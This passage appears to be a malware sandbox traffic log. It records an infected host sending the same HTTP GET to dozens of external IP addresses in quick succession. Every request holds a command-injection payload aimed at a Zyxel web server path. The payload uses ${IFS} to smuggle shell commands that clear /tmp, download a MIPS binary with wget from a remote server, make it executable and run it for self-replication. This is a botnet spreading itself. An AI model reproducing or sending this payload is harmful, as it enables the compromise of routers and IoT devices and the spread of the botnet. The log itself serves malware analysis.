                                            Feb 2, 2024 06:21:25.892250061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7817192.168.2.153482227.8.254.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892307997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7818192.168.2.1536778151.59.26.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892327070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7819192.168.2.1538378119.90.14.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892385960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7820192.168.2.1537726105.1.191.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892406940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7821192.168.2.155154049.146.213.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892436028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7822192.168.2.1553368104.9.2.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892472982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7823192.168.2.155283469.140.31.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892498016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7824192.168.2.154411094.241.222.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892540932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7825192.168.2.155719043.62.80.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892571926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7826192.168.2.155456651.121.248.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892600060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7827192.168.2.1559294172.147.243.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892666101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7828192.168.2.1543500141.78.190.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892700911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7829192.168.2.1538030211.11.144.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892744064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7830192.168.2.1553892196.81.24.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892777920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7831192.168.2.154889887.244.15.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892824888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7832192.168.2.1539034113.44.114.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892843008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7833192.168.2.154121898.77.25.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892879009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7834192.168.2.1548406208.240.255.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892935991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7835192.168.2.155135219.53.60.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892967939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7836192.168.2.153639441.169.30.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893023968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7837192.168.2.1544664168.167.165.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893079042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7838192.168.2.1533778102.209.37.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893096924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7839192.168.2.1554720166.135.129.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893129110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7840192.168.2.1550648107.168.15.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893177986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7841192.168.2.1556790128.99.242.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893234015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7842192.168.2.1544440159.217.30.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893265963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7843192.168.2.1553254132.45.113.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893296957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7844192.168.2.154597643.139.76.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893326044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7845192.168.2.154859275.211.49.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893384933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7846192.168.2.1538006138.78.45.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893407106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7847192.168.2.1541840204.100.10.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893444061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7848192.168.2.1554402178.2.42.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893510103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7849192.168.2.1535064167.183.145.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893542051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7850192.168.2.1545630179.70.165.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893580914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7851192.168.2.1538744142.149.152.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893625021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7852192.168.2.1545830120.81.132.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893666983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7853192.168.2.1558554118.59.227.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893728018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7854192.168.2.1552638135.57.134.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893759966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7855192.168.2.1551366126.123.146.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893795013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7856192.168.2.1537856200.57.115.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893825054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7857192.168.2.15374805.55.167.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893853903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7858192.168.2.153713492.240.154.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893908978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7859192.168.2.154339227.67.30.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893939018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7860192.168.2.1540082128.17.40.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.893980026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7861192.168.2.154380036.74.130.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894022942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7862192.168.2.154311823.53.136.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894072056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7863192.168.2.155967489.210.81.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894114017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7864192.168.2.1543876113.65.221.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894119024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7865192.168.2.1539714162.57.36.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894191980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7866192.168.2.1540592211.159.47.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894228935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7867192.168.2.155399057.81.171.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894262075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7868192.168.2.156072653.34.213.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894298077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7869192.168.2.1538226203.119.194.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894351006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7870192.168.2.154936823.20.30.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894373894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7871192.168.2.1558466131.50.95.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894434929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7872192.168.2.153356480.139.13.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894460917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7873192.168.2.1546418160.247.94.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894510984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7874192.168.2.1551776201.101.73.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894536972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7875192.168.2.1558732116.96.212.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894576073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7876192.168.2.1539100120.108.118.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894608021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7877192.168.2.1544184156.103.179.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894635916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7878192.168.2.1545946197.66.167.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894690037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7879192.168.2.1534036198.3.107.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894714117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7880192.168.2.1559150134.35.195.199443
                                            TimestampBytes transferredDirectionData
